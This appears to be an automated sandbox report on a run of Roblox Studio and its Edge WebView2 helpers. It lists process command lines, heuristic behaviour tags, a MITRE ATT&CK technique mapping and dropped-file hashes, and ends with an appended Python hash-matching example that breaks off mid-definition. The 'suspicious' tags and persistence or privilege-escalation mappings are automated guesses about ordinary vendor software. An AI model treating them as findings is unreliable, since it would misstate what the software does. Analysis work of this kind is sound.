C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe"C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxStudioBeta.exe" -startEvent www.roblox.com/robloxQTStudioStartedEvent -firstLaunch3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2372 -
C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe"C:\Program Files (x86)\Roblox\Versions\version-80c47ff7f44d48f7\RobloxCrashHandler.exe" --no-rate-limit --crashCounter Win-ROBLOXStudio-Crash --baseUrl https://www.roblox.com --attachment=attachment_0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log=C:\Users\Admin\AppData\Local\Roblox\logs\0.630.0.6300556_20240626T234409Z_Studio_6ED98_last.log --attachment=attachment_log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log=C:\Users\Admin\AppData\Local\Roblox\logs\log_0.630.0.6300556_20240626T234409Z_Studio_6ED98_csg3.log --database=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --metrics-dir=C:\Users\Admin\AppData\Local\Roblox\logs\crashes --url=https://upload.crashes.rbxinfra.com/post?format=minidump --annotation=AppVersion=0.630.0.6300556 --annotation=Format=minidump --annotation=HardwareModel= --annotation=HasBootstrapper=true --annotation=InstallFolder=ProgramFilesX86 --annotation=OSPlatform=Windows --annotation=RobloxChannel=production --annotation=RobloxGitHash=ad847d7f5168ecfb2a8f42c2d912f9c436294a66 --annotation=RobloxProduct=RobloxStudio --annotation=StudioVersion=0.630.0.6300556 --annotation=UniqueId=557177522507117585 --annotation=UseCrashpad=True --annotation=app_arch=x86_64 --annotation=application.version=0.630.0.6300556 --annotation=host_arch=x86_64 --initial-client-data=0x4e0,0x4e4,0x4e8,0x42c,0x504,0x7ff7e74d3720,0x7ff7e74d3738,0x7ff7e74d37504⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4036
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --noerrdialogs --embedded-browser-webview-dpi-awareness=2 --enable-features=MojoIpcz --mojo-named-platform-channel-pipe=2372.3620.69693487882639399554⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- System policy modification
PID:2764 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=126.0.6478.114 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=126.0.2592.68 --initial-client-data=0x11c,0x120,0x124,0x104,0x12c,0x7ffdcb9c0148,0x7ffdcb9c0154,0x7ffdcb9c01605⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1432
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1676,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1668 /prefetch:25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4024
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1620,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:35⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3348
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --field-trial-handle=1180,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2560
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3220,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3236 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5336
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3808,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3816 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:5740
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\126.0.2592.68\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView" --webview-exe-name=RobloxStudioBeta.exe --webview-exe-version="0, 630, 0, 6300556" --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=2 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=" --field-trial-handle=3232,i,1243969546081703958,13549805308638243399,262144 --enable-features=MojoIpcz --variations-seed-version --mojo-platform-channel-handle=3628 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:5964
-
-
-
-
-
C:\Windows\System32\GameBarPresenceWriter.exe"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer1⤵PID:2308
-
C:\Windows\System32\GamePanel.exe"C:\Windows\System32\GamePanel.exe" 00000000000B02B8 /startuptips1⤵
- Checks SCSI registry key(s)
PID:5072
-
C:\Windows\System32\bcastdvr.exe"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer1⤵
- Drops desktop.ini file(s)
PID:2716
Network
MITRE ATT&CK Enterprise v15
Persistence
- Event Triggered Execution (2)
  - Component Object Model Hijacking (1)
  - Image File Execution Options Injection (1)
Privilege Escalation
- Access Token Manipulation (1)
  - Create Process with Token (1)
- Event Triggered Execution (2)
  - Component Object Model Hijacking (1)
  - Image File Execution Options Injection (1)
Defense Evasion
- Access Token Manipulation (1)
  - Create Process with Token (1)
- Modify Registry (2)
Downloads
-
Filesize
335B
MD552d92c2943cc6db3fd76c98040193c8a
SHA19a520a9ce3e2ca0e1933c1bfb9d99756f9e3df8a
SHA256c0d089909001cad6dd284f036290740f4042715d14bcb5bfd48aca0726c835c7
SHA5126cc5c6572acc3e413a1109d61533be096bd3f61f435358d232264f6a5471c95d8f393ea557c1216821057921b368a0a3704945d984fdb96b1df392d246aea3c0
-
Filesize
44KB
MD54f18a35997d6e3d5d73e18e5c4da57e8
SHA1ea6d9ece4bd2db4607c35ccb33e057058cb6a5d4
SHA256bfa44b89769b078fb683edfc5144c65c8085c4f455bd49833eceaff5c1335e4c
SHA512b4eb5089ca95a25a33e58e07bed3361720391bd9dbd969ebfd19a26bea3e59418b889b2cef82f3d44dd2665f83379970c5b21e9433e2967a49f2c9b893eaf6ae
-
Filesize
264KB
MD5c5f4956e78109ac31f2d3f4090850047
SHA1b532f6f25e9d18e1ab8b9dd6b3b3926f64f5f757
SHA2569dbfb862c0a083661e49f8b1e8985dbc4f9d8833550b6583623c56a4bab78d09
SHA51240a03b9b36ed2833a0024d4040527ac40f459a57f6b5ae49fa15d32552cba76df7a2f0fcf8b6e1dbfbad5ae9d43ef60d6c89f1a9aef2a2fd9055fcfa4ff1758c
-
Filesize
4.0MB
MD5eec409b424b189351952ec8bf6c16840
SHA127828066c50f7e09f0dd78de67c5b416030ce31a
SHA25674845de0a667293c77cd53dabbc2c8f378e91618761b1be665e00e0153d0cba2
SHA512c70d04316c69b62ed5b523cf997f8079c2166b9795e4956c70b8cc0ab1af51412f0a52a144cb5fd82e240d17b993a5b783d4130c2bcedcd83cd94e66a9d7c69f
-
Filesize
14B
MD59eae63c7a967fc314dd311d9f46a45b7
SHA1caba9c2c93acfe0b9ceb9ab19b992b0fc19c71cf
SHA2564288925b0cf871c7458c22c46936efb0e903802feb991a0e1803be94ca6c251d
SHA512bed924bff236bf5b6ce1df1db82e86c935e5830a20d9d24697efd82ca331e30604db8d04b0d692ec8541ec6deb2225bcc7d805b79f2db5726642198ecf6348b8
-
Filesize
289KB
MD537e2182608235f20601e631bb9c8f7bc
SHA1b3377f1fbdd8ad50f6ba02dbc2dedc4a88d2e911
SHA256ceee2bc557297b8e82dc36616d60ba95d6e9d01d4d5e8119c1d2fd33c6da6f63
SHA512ff1b4b103769e8502b006a8fafc8153d96035549a9e2f90600f7837071d3ffd5a91f8c3d5a0ed81d3f0580939fc6523070d18b801263a2548e447c2d12156516
-
Filesize
111KB
MD5406ac467f0149f72e8c1f05c09fa402e
SHA12286efa38ee76150ee148f65621e67b786d387ad
SHA25665dfc8831474e12e1a8db5ca5a26fff0f3d52916d557f59b743957f67e14954e
SHA51271971c0978d306ca1b5b306afb7984ed6334699c0cbe81cf85a95e64db733b309e04e67c68ac735d26b16202ae37ad3ddd741d5733fc8f5ec56c42ef58597727
-
Filesize
105KB
MD5aedf06ecb50fa71102e5498d624a7565
SHA17a796f6382e99449b50610d67393fe5f8d4aff52
SHA256362cbaa627a6a073d517d0f76ae7f1109efc25f601b764e47f0735daac6aaf6f
SHA512023bf48dc2151383c5c510f7decddfc4de12785c8faa27272a928823e991f774866c993ab3beaebbee8bc28c76f501753d5a1889d4349c64f0f087d47db8a2ac
-
Filesize
93KB
MD569731a4a1dbb74437bc28af549a9eaa5
SHA1c024ea7bb3372f45cc64123c8956651ac90ebedc
SHA25613b60ca4336678c504f0bff76a32801b73321de88ebfe41c28679ebb0009063d
SHA5125a8d6937a89c34bdd8504c29b680546f5dc0086f297bb2b535e9cf5771181fb412444f4059f1dbf8974c7622187daaa0cf4a9a34553c1dd0f24aca139377c097
-
Filesize
85B
MD5bc6142469cd7dadf107be9ad87ea4753
SHA172a9aa05003fab742b0e4dc4c5d9eda6b9f7565c
SHA256b26da4f8c7e283aa74386da0229d66af14a37986b8ca828e054fc932f68dd557
SHA51247d1a67a16f5dc6d50556c5296e65918f0a2fcad0e8cee5795b100fe8cd89eaf5e1fd67691e8a57af3677883a5d8f104723b1901d11845b286474c8ac56f6182
-
Filesize
157KB
MD5f833008e5731462860c015c995973009
SHA1d8f5382200c7cbbe1b4d29190ef57ad55292b2e6
SHA2568fb8196d0fac9270c07bc3dd5b434660e674276ebe7b402071f88d95ce42ab29
SHA512b14a03667943261ce0681d23abe26bf326927d385351ff51592cd62fd74f7c1fd1715ee0848bbe26d318e64cfdaad173e158a9de56d1c49fc39615407bc4147b
-
Filesize
2B
MD599914b932bd37a50b983c5e7c90ae93b
SHA1bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA25644136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA51227c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd
-
Filesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\Temp\~DFE8A849A3C70D9446.TMP
Filesize16KB
MD55a977b11d547429ce65a3debfe115ff8
SHA1fe174e5161f76594b143bfd6428d5e259fb996ba
SHA25600a0c27e9cfcd39338c28b3a80a3d41ebc73b8f47320c588823ad3e75fe61341
SHA512369a2a2097618108dc5547bfc6a404003d5f8ff795904afe0cff85e886d089c22724124dba130ff7ae4ede0575e45d8b56a632cd56e153999621338a29478cbe
-
Filesize
5.8MB
MD5071a86a82f51e91c9a47bb2db7499e0c
SHA1d583e6fc19ddf59a70b7f3898fb1b1933504cfeb
SHA25615ce1bdd1a117d0a755f8f77e5a789ccf171cfd0c56bb7532ac8cad8c35de692
SHA5121345b189bfc4c5a7eb9c6397efb2d9d19a6498b6e4da03e5b2fee3904c2ce914b3d4ea7f80958dfd5946fb92ab1c45b262f81a029a7302237b96575c94160dbe
-
Filesize
280B
MD5f6d8cc0cbb2389c58d50fd287e8c0c3d
SHA1d03b19066113b2ebad2dce212e9b3d0ecd703024
SHA2569729a21d9de42b6a09772bbc51d38073536f380551dc1200a97365c090e8f21b
SHA5127cc58bf88f66e35019c4ab38f5aff3d10757b78c266a0aa625b99a74abf6e17b303c7f6fdb77a540e194655ccd6ede2511cdaa52567edd1b8646dbe229345508
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00000c
Filesize39KB
MD5e1f6e032096b2924e561c3928b9dc73d
SHA1f33a3bb1b04f04ed1b93b13d21b6b3ce529690ad
SHA256fa802b853572d8a40ee939940d0cd9562ea8f5954c0522b0777e01fcb546c3c8
SHA512b13f6e1f984d28c5f4cfc4ae2298b321c314892cab1e5ccd6f1f61ec98d8c1a39669078c88ba541c91648963abc6e16e0a1cdb4e9449b4be16927e9bad8d0f37
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000012
Filesize147KB
MD5759ab24cf5846f06c5cdb324ee4887ea
SHA141969c5b737bc40bbb54817da755e3aa7d02f3c6
SHA2567037e6c967c38477a5fcd583c74892e16b7a9066cd60287c7035bf0760d05471
SHA5123470ae07eb7c54feee1e791e63a365cfb0da42f570a66e6c84faf5db6bf8395173c6cb60e8c5cf28eae409f26ea5433c3c5d6ea32eb07e5997c979c6e3ccf4be
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_000018
Filesize42KB
MD5b715a5dd019d1b8771a3031ff85c972b
SHA15768744eb85d3137d094458e4b7842c1c5c526cd
SHA256e9ca7a8587bb3674824a28a8a80836e3483dc3bbe97c658bf7c984c5b424920a
SHA51222e09e48a13ced3a3cd95a5f40b5e9ccbbad8abbd0d6af7dd4e411d63c662b09f1ad2453909a6c7a0d0ce34f250f2fbf0d7f076dced281f133ab7f21d2008d1a
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Cache\Cache_Data\f_00001a
Filesize42KB
MD5cc7ad65e0558327d8fbe8ade40ab94e8
SHA16c153e9bf971f196db25cb2cb3b62f77f0a1299a
SHA256956e1fd407995ff1ecca3bf42ca0d01086edc7eb6a965e1d9d4a48f197a8bd30
SHA5120af63a7bb1151ef7564472b90ddd766857e3fd78973195817aa751d97093558688733876114ea7341063c7f1bc01f90aba1016980ce2c009a0cc399f40614377
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Network\SCT Auditing Pending Reports
Filesize2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Roblox\RobloxStudio\WebView2\EBWebView\Default\Sync Data\LevelDB\MANIFEST-000001
Filesize41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
Filesize
8KB
MD5cf89d16bb9107c631daabf0c0ee58efb
SHA13ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA5128cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0
-
Filesize
8KB
MD50962291d6d367570bee5454721c17e11
SHA159d10a893ef321a706a9255176761366115bedcb
SHA256ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed
-
Filesize
8KB
MD541876349cb12d6db992f1309f22df3f0
SHA15cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e
-
Filesize
1KB
MD5c8fe0dee9ad0e3447b065a9a7aa18ea2
SHA17d89a85aa89e8b6f89321b16f39f6e4e3bb071d1
SHA256cec214c0d6e065268e2ad979110de292a98c85329c661d004f21cf39ab8e777b
SHA512dca3cf3eb1d59335d0ee202d96726e0b42ea2da925493e9a0eaf5389f93f7d9884b244d45fecde1a548fd4ad0b648fb2248a59d9aa1efb55e15eb8faafb3a083
-
Filesize
3KB
MD5c0977e1329a811878a4994c8d772986d
SHA14ea18625273d20c417be7a797568deb642934eb1
SHA2564e82577f77aecdba25584c81787e78ecc8b636ffe9df792cb7b3f09739e973d6
SHA51219bb6ca69751b5fb7e0ff7e836386ec098854a6b7906106dd554bb2e12a725c7dd246a520b14b12fe1c916b9b892b6ab9cbadc241a5a80426a47f96bcc5a9b88
-
Filesize
4KB
MD58a580600bd1b62ee582825d721e2b92e
SHA1511a565a322e1bef7fffd82890fb2efc73c35e5f
SHA256e7b7caa1b3f171507a419e46e5b893aa994843fe15a570eb74e0d47d543a2f20
SHA512858385356e38a4d8e4e0c01410454f61d7834c0f8b413786b294ef0f8957aafd36d1520e8bbbbb7dd98ae49202d7eb1302ea68ef70ca9888dfe6d2f0365e4b7f
-
Filesize
1KB
MD5cd4ddd3b7c931ef1828073049930521e
SHA1023fb57a0f5be04205367ae0f14b44ce3598cc05
SHA256bd22de1154e2f3b10595c45847d8b6941b03b476b3e6272a186f7bcf6020fc1b
SHA512429d0a55ef5f2f42b24c173e58d1b20200721b6bfe880f4514b5ea0fdda05652b02f8e5eb46d01bcd80c22bd843d25185cde6a5e3c07238d0f1578dc46b4cda3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\db\data.safe.bin
Filesize2KB
MD50c6349cb49dee08def4934260e809ce8
SHA1d8768c2ee0eea660665e32123627bbafd1c2d16d
SHA256294398f646605cc9ed61aace3c2bd190e4f7c0c41c090d99f1738476e7a205f0
SHA51203a97fc7c561fce52f5c87cc006220cc6590ed4cb46d189ef285c62ca0752352cec8396fc3823484437de9f298ff98c7d5365e5a6b3d053e8113a26a108ea243
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\99e4d963-f29b-4b2f-8894-469988feca3c
Filesize10KB
MD5a2a4aab8fe885266450cde5e469a66ac
SHA16782e2b78f9d03beaafa1fb6a9bb3a78776bcd20
SHA25661aaa1fda357d90f2242e05165de9bdad49cbc68955e89eb745fa269b28f673e
SHA512db0c9b86f8468ba12f922d944cc2bea82e1afa03a68b3557527cf2640555b61d38a0626da0efd2a57a26ceb27d32ba180305a2dc82217a53e68aea3095a02894
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\datareporting\glean\pending_pings\bfef07aa-4682-4211-a32b-8e0f2c251d8d
Filesize746B
MD54e8b0733ed195d8fae7c0ce7700c04ca
SHA1eb60a6d4d81750fa0dc7abe774d42a1165e2bc0d
SHA2560944d7240ea8f59dc48ccc2e4a4079768745d4c13df84cadfb685b7eed5fe5d6
SHA5123ee7bdc50ede259daaf4af7e35e744a477b4c6779a8118a4acc76feb5253462fbb2f7526cc21a7b948734be5b3f554bf218584905c537a3097f87678ca3cd876
-
Filesize
6KB
MD51e6cdbd02fba7e869e6b80cb60460bd0
SHA157329d737531322c58297fa2776b13c53ba699bf
SHA256a488b2ff927ce5dcb1e750d46a3fe29b7af7937073917233e81a382a0ce0829c
SHA51249ded7887528d894d76370ff4631c0825aefedb2fc46c69912fe598c139beaadded057e4038e4094ead5a2084b31fa64e6006f32a4f88b971a02b0de8087728a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\sessionstore.jsonlz4
Filesize909B
MD59de2053a65008cab509665694a9a49e8
SHA10be46b94c2585efa3f7d3fb885786a471ceff3aa
SHA2569fd6495202e76ac60c2998b583eb0f322e0fa33727e19adbe2fbed59ae82e800
SHA512661cddd88692db366c79d49495a9b18c7d62846145e810804c204e3e88e2f08f255e85e7f4edf8504e5a95dede94000c3435908d7769c58a390fd6f9c309f482
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\je1358xf.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize184KB
MD5731c0e733fe1e3123d366af7c8e578ae
SHA19756304ea773dd9cd96e5996dc79de2ed6a9ae9c
SHA2568f426b4be5e3440fa14d37480f018b7dc3d1a547b0e91c2fbfc6e31d9054a359
SHA512d29e0f2356a3226f64692b390c122d4d70f09f677d9f5d086f2babaeba6574d670171edb24ff52f928871ec489680f57910e21fac1ca8ec08783a07d21b1f427
-
Filesize
5.5MB
MD527469372591b14ff1c57654facb5e020
SHA1492c166cd0e6c8d122ca4687659bf047cd48afd7
SHA2563b8fcd52686095049b1563fbb6ba0bf73113a01b13c303bebcb36d8339a1519f
SHA5120cfa845de57acf6f17f295f0771c2a61cd846efdee79da012def474bcaa91d9e99d3d528cf5698e6112a310c4f97e98ae74b6cfc601b2988c51e92270ebf92a2
-
Filesize
190B
MD5b0d27eaec71f1cd73b015f5ceeb15f9d
SHA162264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA25686d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA5127b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c
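The dropped-file listing above is a flat run of Filesize/MD5/SHA1/SHA256/SHA512 entries, many of them without a recorded path, and the extracted text fuses some labels onto their values ("Filesize16KB", "MD5b5e1..."). The following is an added example, not part of the tria.ge report or of any tool the report describes: it parses a listing in that shape into records, rejects digests of the wrong length, and matches arbitrary file bytes against the records, grading a hit as strong only when SHA-256 or SHA-512 agrees (MD5 and SHA-1 are collision-broken and should not drive a block decision on their own). The sample listing embedded in the code is constructed from two 2-byte entries on this page, whose digests are those of the strings `{}` and `[]`; the record and function names are the example's own.

```python
"""Parse a flattened sandbox 'dropped files' hash listing and match file bytes against it.

Added example, not code from the tria.ge report. SAMPLE_LISTING is constructed from
two entries visible on the page; everything else here is illustrative.
"""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Hex-digest length per algorithm; anything else is truncated or garbled.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Accepts "MD5 <hex>", the fused "MD5<hex>" and a bare "Filesize" whose value follows on the next line.
LABEL_RE = re.compile(r"^(Filesize|MD5|SHA1|SHA256|SHA512)\s*(\S*)$")
HEX_RE = re.compile(r"[0-9a-f]+")


@dataclass
class DroppedFile:
    path: Optional[str] = None          # None when the report did not record a path
    filesize: Optional[str] = None      # kept as the report's string ("2B", "4.0MB")
    digests: Dict[str, str] = field(default_factory=dict)


def _assign(rec: DroppedFile, label: str, value: str) -> None:
    if label == "Filesize":
        rec.filesize = value
        return
    value = value.lower()
    if len(value) != DIGEST_LEN[label] or not HEX_RE.fullmatch(value):
        raise ValueError(f"{label} digest has wrong length or charset: {value!r}")
    rec.digests[label] = value


def parse_listing(text: str) -> List[DroppedFile]:
    """Records are separated by lines consisting of a single '-'."""
    records: List[DroppedFile] = []
    cur = DroppedFile()
    pending: Optional[str] = None       # label whose value is on the following line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            if cur.digests or cur.path:
                records.append(cur)
            cur, pending = DroppedFile(), None
            continue
        if pending:
            _assign(cur, pending, line)
            pending = None
            continue
        m = LABEL_RE.match(line)
        if m:
            label, value = m.groups()
            if value:
                _assign(cur, label, value)
            else:
                pending = label
        elif line.startswith(("C:\\", "\\")):
            cur.path = line
        else:
            raise ValueError(f"unrecognised line: {line!r}")
    if cur.digests or cur.path:
        records.append(cur)
    return records


def hash_bytes(data: bytes) -> Dict[str, str]:
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA1": hashlib.sha1(data).hexdigest(),
        "SHA256": hashlib.sha256(data).hexdigest(),
        "SHA512": hashlib.sha512(data).hexdigest(),
    }


def match_iocs(data: bytes, records: List[DroppedFile]) -> List[dict]:
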